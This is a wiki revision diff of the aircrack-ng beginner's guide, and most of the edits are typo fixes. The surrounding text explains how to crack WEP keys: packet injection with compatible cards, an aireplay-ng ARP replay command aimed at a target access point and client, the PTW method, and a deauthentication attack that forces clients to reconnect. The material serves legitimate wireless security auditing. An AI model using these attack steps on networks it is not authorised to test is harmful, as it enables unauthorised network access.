Differences

This shows you the differences between two versions of the page.

--- newbie_guide [2009/08/14 18:35] – use dokuwiki internal links mister_x
+++ newbie_guide [2010/11/21 00:05] – typos sleek
@@ Line 15: / Line 15: @@
 Needless to say, you need a wireless card which is compatible with the aircrack-ng suite.  This is hardware which is fully compatible and can inject packets.  A compatible wireless card can be used to crack a wireless access point in under an hour.
-To determine to which category your card belongs to, see [[compatibility_drivers|hardware compatibility page]]. Read [[compatible_cards|Tutorial: Is My Wireless Card Compatible?]] if you don't know where to look in this table.  It still does not hurt to read this tutorial to build your knowledge and confirm your card attibutes.
+To determine to which category your card belongs to, see [[compatibility_drivers|hardware compatibility page]]. Read [[compatible_cards|Tutorial: Is My Wireless Card Compatible?]] if you don't know where to look in this table.  It still does not hurt to read this tutorial to build your knowledge and confirm your card attributes.
 First, you need to know which chipset is used in your wireless card and which driver you need for it. You will have determined this using the information in the previous paragraph.  The [[compatibility_drivers#drivers|drivers section]] will tell you which drivers you need for your specific chipset.  Download them and then get the corresponding patch from http://patches.aircrack-ng.org. (These patches enables the support for injection.)
@@ Line 148: / Line 148: @@
 ^ PWR          | Signal strength. Some drivers don't report it  |
 ^ Beacons      | Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality |
-^ Data         | Number of data frames recieved   |
+^ Data         | Number of data frames received   |
 ^ CH           | Channel the AP is operating on   |
 ^ MB           | Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture  |
@@ Line 159: / Line 159: @@
 ^ STATION      | The MAC of the client itself  |
 ^ PWR          | Signal strength. Some drivers don't report it  |
-^ Packets      | Number of data frames recieved   |
+^ Packets      | Number of data frames received   |
 ^ Probes       | Network names (ESSIDs) this client has probed  |
@@ Line 188: / Line 188: @@
 For more information about [[aircrack-ng]] parameters, description of the output and usage see the [[aircrack-ng|manual]].
-The number of IVs you need to crack a key is not fixed. This is because some IVs are weaker and leak more information about the key than others. Usually these weak IVs are randomly mixed in between the stonger ones. So if you are lucky, you can crack a key with only 20 000 IVs. But often this it not enough and aircrack-ng will run a long time (up to a week or even longer with a high fudge factor) and then tell you the key could not be cracked. If you have more IVs cracking can be done a lot faster and is usually done in a few minutes, or even seconds. Experience shows that 40 000 to 85 000 IVs is usually enough for cracking.
+The number of IVs you need to crack a key is not fixed. This is because some IVs are weaker and leak more information about the key than others. Usually these weak IVs are randomly mixed in between the stronger ones. So if you are lucky, you can crack a key with only 20 000 IVs. But often this it not enough and aircrack-ng will run a long time (up to a week or even longer with a high fudge factor) and then tell you the key could not be cracked. If you have more IVs cracking can be done a lot faster and is usually done in a few minutes, or even seconds. Experience shows that 40 000 to 85 000 IVs is usually enough for cracking.
 There are some more advanced APs out there that use an algorithm to filter out weak IVs. The result is either that you can't get more than "n" different IVs from the AP or that you'll need millions (like 5 to 7 million) to crack the key. Search in the [[http://forum.aircrack-ng.org/|Forum]], there are some threads about cases like this and what to do.
@@ Line 236: / Line 236: @@
 Wait for a client to show up on the target network. Then start the attack:
-  aireplay-ng - -arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
+  aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
 -b specifies the target BSSID, -h the MAC of the connected client.
@@ Line 242: / Line 242: @@
 Now you have to wait for an ARP packet to arrive. Usually you'll have to wait for a few minutes (or look at the next chapter).
-If you were successfull, you'll see something like this:
+If you were successful, you'll see something like this:
   Saving ARP requests in replay_arp-0627-121526.cap
@@ Line 253: / Line 253: @@
 When using the arp injection technique, you can use the PTW method to crack the WEP key.  This dramatically reduces the number of data packets you need and also the time needed.  You must capture the full packet in airodump-ng, meaning do not use the "-''''-ivs" option when starting it.  For [[aircrack-ng]], use "aircrack -z <file name>". (PTW is the default attack in 1.0-rc1.)
-If the number of data packets received by airodump-ng sometimes stops increasing you maybe have to reduce the replay-rate. You do this with the -x <packets per second> option. I usually start out with 50 and reduce until packets are received contiously again. Better positioning of your antenna usually also helps.
+If the number of data packets received by airodump-ng sometimes stops increasing you maybe have to reduce the replay-rate. You do this with the -x <packets per second> option. I usually start out with 50 and reduce until packets are received continuously again. Better positioning of your antenna usually also helps.
 ==== The aggressive way ====
-Most operating sytems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID and possibly a keystream during reconnection too. This comes in handy if the ESSID of your target is hidden, or if it uses shared-key authentication.
+Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID and possibly a keystream during reconnection too. This comes in handy if the ESSID of your target is hidden, or if it uses shared-key authentication.
 Keep your airodump-ng and aireplay-ng running. Open another window and run a [[deauthentication]] attack:
@@ Line 273: / Line 273: @@
 ====== Further tools and information ======
-[[http://www.tuto-fr.com/tutoriaux/crack-wep/aircrack-ng.php|Tutorial in french for aircrack-ng]] [[http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php|or in english]]
+[[http://www.tuto-fr.com/tutoriaux/crack-wep/aircrack-ng.php|Tutorial in french for aircrack-ng]] [[http://www.tuto-fr.com/en/tutorial/tutorial-crack-wep-aircrack.php|or in english]]